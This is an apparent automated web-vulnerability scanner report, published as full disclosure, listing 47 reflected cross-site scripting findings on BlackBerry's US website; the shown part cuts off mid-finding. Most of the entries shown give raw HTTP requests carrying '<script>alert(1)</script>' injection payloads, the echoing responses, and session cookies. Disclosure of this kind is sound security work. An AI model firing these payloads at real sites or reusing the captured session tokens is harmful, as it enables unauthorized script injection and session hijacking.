Current Research | Full Disclosure | As of March 14, 2011

Plesk SMB 10.2.0 Windows - Site Editor | Full Disclosure
Plesk Small Business Manager 10.2.0 for Windows | Full Disclosure
Hoyt LLC Research | Full Disclosure Report on Stored XSS in SmarterMail 8.0
Hoyt LLC Research - Full Disclosure | Blog Article | SmarterStats 6.0
Hoyt LLC Research - Full Disclosure | Blog Article | SmarterMail 7.x Series
Report generated by XSS.CX at Wed Nov 24 19:58:21 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research

1. Cross-site scripting (reflected)

1.1. http://us.blackberry.com/devices/blackberrybold/bold_wheretobuy.jsp [REST URL parameter 2]

1.2. http://us.blackberry.com/devices/blackberrybold/bold_wheretobuy.jsp [REST URL parameter 3]

1.3. http://us.blackberry.com/devices/compare/compareCart.jsp [REST URL parameter 2]

1.4. http://us.blackberry.com/devices/compare/compareCart.jsp [REST URL parameter 3]

1.5. http://us.blackberry.com/devices/modalContent.jsp [REST URL parameter 2]

1.6. http://us.blackberry.com/devices/modalContent.jsp [url parameter]

1.7. http://us.blackberry.com/eng/devices/compare/compareCart.jsp [REST URL parameter 3]

1.8. http://us.blackberry.com/eng/devices/compare/compareCart.jsp [REST URL parameter 4]

1.9. http://us.blackberry.com/eng/devices/modalContent.jsp [REST URL parameter 3]

1.10. http://us.blackberry.com/eng/devices/modalContent.jsp [url parameter]

1.11. http://us.blackberry.com/eng/purchase/icon_games.gif [REST URL parameter 3]

1.12. http://us.blackberry.com/eng/purchase/icon_phone.gif [REST URL parameter 3]

1.13. http://us.blackberry.com/eng/purchase/icon_software.gif [REST URL parameter 3]

1.14. http://us.blackberry.com/eng/purchase/united-states/ [REST URL parameter 3]

1.15. http://us.blackberry.com/navigation/search.do [siteSearch parameter]

1.16. http://us.blackberry.com/navigation/search.do [siteSearch parameter]

1.17. http://us.blackberry.com/navigation/search.do [siteSearch parameter]

1.18. http://us.blackberry.com/purchase/accessories_purchase_promo2.jpg [REST URL parameter 2]

1.19. http://us.blackberry.com/purchase/att/ [REST URL parameter 2]

1.20. http://us.blackberry.com/purchase/icon_games.gif [REST URL parameter 2]

1.21. http://us.blackberry.com/purchase/icon_phone.gif [REST URL parameter 2]

1.22. http://us.blackberry.com/purchase/icon_software.gif [REST URL parameter 2]

1.23. http://us.blackberry.com/purchase/united-states/ [REST URL parameter 2]

1.24. http://us.blackberry.com/smartphones/blackberrybold/ [REST URL parameter 2]

1.25. http://us.blackberry.com/smartphones/blackberrybold/bold_wheretobuy.jsp [REST URL parameter 2]

1.26. http://us.blackberry.com/smartphones/blackberrybold/bold_wheretobuy.jsp [REST URL parameter 3]

1.27. http://us.blackberry.com/smartphones/blackberrybold/wheretoDetails.jsp [REST URL parameter 2]

1.28. http://us.blackberry.com/smartphones/blackberrybold/wheretoDetails.jsp [REST URL parameter 3]

1.29. http://us.blackberry.com/smartphones/blackberrybold/wheretoDetailsHero.jsp [REST URL parameter 2]

1.30. http://us.blackberry.com/smartphones/blackberrybold/wheretoDetailsHero.jsp [REST URL parameter 3]

1.31. http://us.blackberry.com/smartphones/blackberrycurve3G/ [REST URL parameter 2]

1.32. http://us.blackberry.com/smartphones/blackberrycurve3G/overviewDetails.jsp [REST URL parameter 2]

1.33. http://us.blackberry.com/smartphones/blackberrycurve3G/overviewDetails.jsp [REST URL parameter 3]

1.34. http://us.blackberry.com/smartphones/blackberrycurve3G/overviewDetailsHero.jsp [REST URL parameter 2]

1.35. http://us.blackberry.com/smartphones/blackberrycurve3G/overviewDetailsHero.jsp [REST URL parameter 3]

1.36. http://us.blackberry.com/smartphones/blackberrytorch/ [REST URL parameter 2]

1.37. http://us.blackberry.com/smartphones/blackberrytorch/wheretoDetails.jsp [REST URL parameter 2]

1.38. http://us.blackberry.com/smartphones/blackberrytorch/wheretoDetails.jsp [REST URL parameter 3]

1.39. http://us.blackberry.com/smartphones/blackberrytorch/wheretoDetailsHero.jsp [REST URL parameter 2]

1.40. http://us.blackberry.com/smartphones/blackberrytorch/wheretoDetailsHero.jsp [REST URL parameter 3]

1.41. http://us.blackberry.com/smartphones/compare/compareCart.jsp [REST URL parameter 2]

1.42. http://us.blackberry.com/smartphones/compare/compareCart.jsp [REST URL parameter 3]

1.43. http://us.blackberry.com/smartphones/modalContent.jsp [REST URL parameter 2]

1.44. http://us.blackberry.com/smartphones/modalContent.jsp [url parameter]

1.45. http://us.blackberry.com/where-to-buy/att/ [REST URL parameter 2]

1.46. http://us.blackberry.com/where-to-buy/united-states/ [REST URL parameter 2]

1.47. http://www.blackberry.com/btsc/microsites/search.do [name of an arbitrarily supplied request parameter]

2. Cookie without HttpOnly flag set

3. Cross-domain Referer leakage

4. Email addresses disclosed

4.1. http://www.blackberry.com/btsc/microsites/js//js/custom_functions.js

4.2. http://www.blackberry.com/btsc/microsites/js//js/main.js



1. Cross-site scripting (reflected)  next
There are 47 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://us.blackberry.com/devices/blackberrybold/bold_wheretobuy.jsp [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /devices/blackberrybold/bold_wheretobuy.jsp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9962f"><script>alert(1)</script>f7e2b64f5d4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /devices/blackberrybold9962f"><script>alert(1)</script>f7e2b64f5d4/bold_wheretobuy.jsp HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://us.blackberry.com/where-to-buy/united-states/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=rimglobal%2Crimbbus%3D%2526pid%253Dus%25253Abb%25253Apurchase%25253Aunited-states%25253APurchase%252520Smartphones%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fus.blackberry.com%25252Fdevices%25252Fblackberrybold%25252Fbold_wheretobuy.jsp%2526ot%253DA%2526oi%253D612; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":4,"to":3,"c":"http://us.blackberry.com/where-to-buy/united-states/","lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0,"f":1290619569784,"l":"en-US","i":-1}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@16@d/2210/2334&e/10; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; fsr.r={"d":90,"i":"1290619537652_749032","e":1291224374976}; server_instance=edmonton; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:55:25 GMT
Date: Wed, 24 Nov 2010 22:55:25 GMT
Connection: close
Content-Length: 21944


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/smartphones/blackberrybold9962f"><script>alert(1)</script>f7e2b64f5d4/bold_wheretobuy.jsp" />
...[SNIP]...

1.2. http://us.blackberry.com/devices/blackberrybold/bold_wheretobuy.jsp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /devices/blackberrybold/bold_wheretobuy.jsp

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af732"><script>alert(1)</script>5aba140e60 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /devices/blackberrybold/af732"><script>alert(1)</script>5aba140e60 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://us.blackberry.com/where-to-buy/united-states/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=rimglobal%2Crimbbus%3D%2526pid%253Dus%25253Abb%25253Apurchase%25253Aunited-states%25253APurchase%252520Smartphones%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fus.blackberry.com%25252Fdevices%25252Fblackberrybold%25252Fbold_wheretobuy.jsp%2526ot%253DA%2526oi%253D612; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":4,"to":3,"c":"http://us.blackberry.com/where-to-buy/united-states/","lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0,"f":1290619569784,"l":"en-US","i":-1}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@16@d/2210/2334&e/10; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; fsr.r={"d":90,"i":"1290619537652_749032","e":1291224374976}; server_instance=edmonton; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:55:27 GMT
Date: Wed, 24 Nov 2010 22:55:27 GMT
Connection: close
Content-Length: 21906


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/smartphones/blackberrybold/af732"><script>alert(1)</script>5aba140e60/" />
...[SNIP]...

1.3. http://us.blackberry.com/devices/compare/compareCart.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /devices/compare/compareCart.jsp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35575"><script>alert(1)</script>47ec518c27a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /devices/compare35575"><script>alert(1)</script>47ec518c27a/compareCart.jsp?_=1290619520675&show=compareCart HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://us.blackberry.com/
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; s_cc=true; dfa_cookie=rimglobal%2Crimbbus; s_sq=%5B%5BB%5D%5D; s_sv_sid=951204897142; s_sv_p1=1@15@d/2210/2334&e/2; s_sv_s1=1@16@a//1290619520282

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Expires: 0
Cache-Control: no-store,no-cache,must-revalidate
Cache-Control: post-check=0,pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Date: Wed, 24 Nov 2010 22:55:24 GMT
Connection: close
Set-Cookie: server_instance=dawson; Path=/
Set-Cookie: JSESSIONID=EF8D93497ED18AF751FD25CFB1778B89; Path=/
Content-Length: 21958


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/smartphones/compare35575"><script>alert(1)</script>47ec518c27a/compareCart.jsp" />
...[SNIP]...

1.4. http://us.blackberry.com/devices/compare/compareCart.jsp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /devices/compare/compareCart.jsp

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a871"><script>alert(1)</script>cbdafff533b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /devices/compare/3a871"><script>alert(1)</script>cbdafff533b?_=1290619520675&show=compareCart HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://us.blackberry.com/
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; s_cc=true; dfa_cookie=rimglobal%2Crimbbus; s_sq=%5B%5BB%5D%5D; s_sv_sid=951204897142; s_sv_p1=1@15@d/2210/2334&e/2; s_sv_s1=1@16@a//1290619520282

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:55:25 GMT
Date: Wed, 24 Nov 2010 22:55:25 GMT
Connection: close
Content-Length: 21930


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/smartphones/compare/3a871"><script>alert(1)</script>cbdafff533b/" />
...[SNIP]...

1.5. http://us.blackberry.com/devices/modalContent.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /devices/modalContent.jsp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee2d0"><script>alert(1)</script>0fa244ab0ad was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /devices/ee2d0"><script>alert(1)</script>0fa244ab0ad?modalid=shareMenu&url=http://us.blackberry.com/smartphones/ HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://us.blackberry.com/smartphones/
Accept: text/html, */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=rimglobal%2Crimbbus%3D%2526pid%253Dus%25253Abb%25253Adevices%25253ADevices%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fus.blackberry.com%25252Fsmartphones%25252F%252523shareMenu%2526ot%253DA%2526oi%253D521; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":3,"to":3,"c":"http://us.blackberry.com/navigation/search.do","lc":{"d0":{"v":3,"s":true}},"cd":0,"sd":0,"f":1290619549646}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@15@d/2210/2334&e/7; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; server_instance=edmonton; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:55:20 GMT
Date: Wed, 24 Nov 2010 22:55:20 GMT
Connection: close
Content-Length: 21941


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/smartphones/ee2d0"><script>alert(1)</script>0fa244ab0ad/" />
...[SNIP]...

1.6. http://us.blackberry.com/devices/modalContent.jsp [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /devices/modalContent.jsp

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8a95"><script>alert(1)</script>327a846b3b0 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /devices/modalContent.jsp?modalid=shareMenu&url=http://us.blackberry.com/smartphones/a8a95"><script>alert(1)</script>327a846b3b0 HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://us.blackberry.com/smartphones/
Accept: text/html, */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=rimglobal%2Crimbbus%3D%2526pid%253Dus%25253Abb%25253Adevices%25253ADevices%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fus.blackberry.com%25252Fsmartphones%25252F%252523shareMenu%2526ot%253DA%2526oi%253D521; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":3,"to":3,"c":"http://us.blackberry.com/navigation/search.do","lc":{"d0":{"v":3,"s":true}},"cd":0,"sd":0,"f":1290619549646}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@15@d/2210/2334&e/7; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; server_instance=edmonton; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response (redirected)

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:55:15 GMT
Date: Wed, 24 Nov 2010 22:55:15 GMT
Connection: close
Content-Length: 2978

<!-- template-body -->


   <div class="shareModal modalSprite">
       <div class="content">
                   <div class="label">Share</div>
                   <a class="cta close" href="#" target="_blank"></a
...[SNIP]...
<a onclick="shareLinkClicked(this.innerHTML);" href="http://buzz.yahoo.com/buzz?targetUrl=http://us.blackberry.com/smartphones/a8a95"><script>alert(1)</script>327a846b3b0?CPID=OTC-SHAREYAHOOBUZZ" class="iconB modalSprite icon" target="_blank">
...[SNIP]...

1.7. http://us.blackberry.com/eng/devices/compare/compareCart.jsp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /eng/devices/compare/compareCart.jsp

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa2d0"><script>alert(1)</script>654fe8d4f22 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /eng/devices/comparefa2d0"><script>alert(1)</script>654fe8d4f22/compareCart.jsp?_=1290619520675&show=compareCart HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://us.blackberry.com/
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; s_cc=true; dfa_cookie=rimglobal%2Crimbbus; s_sq=%5B%5BB%5D%5D; s_sv_sid=951204897142; s_sv_p1=1@15@d/2210/2334&e/2; s_sv_s1=1@16@a//1290619520282

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Expires: 0
Cache-Control: no-store,no-cache,must-revalidate
Cache-Control: post-check=0,pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Date: Wed, 24 Nov 2010 22:54:37 GMT
Connection: close
Set-Cookie: server_instance=edmonton; Path=/
Set-Cookie: JSESSIONID=4FDB2F5DC05E438514C8C2EC1F016538; Path=/
Content-Length: 21958


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/smartphones/comparefa2d0"><script>alert(1)</script>654fe8d4f22/compareCart.jsp" />
...[SNIP]...

1.8. http://us.blackberry.com/eng/devices/compare/compareCart.jsp [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /eng/devices/compare/compareCart.jsp

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2b76"><script>alert(1)</script>73cae73d93d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /eng/devices/compare/e2b76"><script>alert(1)</script>73cae73d93d?_=1290619520675&show=compareCart HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://us.blackberry.com/
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; s_cc=true; dfa_cookie=rimglobal%2Crimbbus; s_sq=%5B%5BB%5D%5D; s_sv_sid=951204897142; s_sv_p1=1@15@d/2210/2334&e/2; s_sv_s1=1@16@a//1290619520282

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:54:40 GMT
Date: Wed, 24 Nov 2010 22:54:40 GMT
Connection: close
Content-Length: 21930


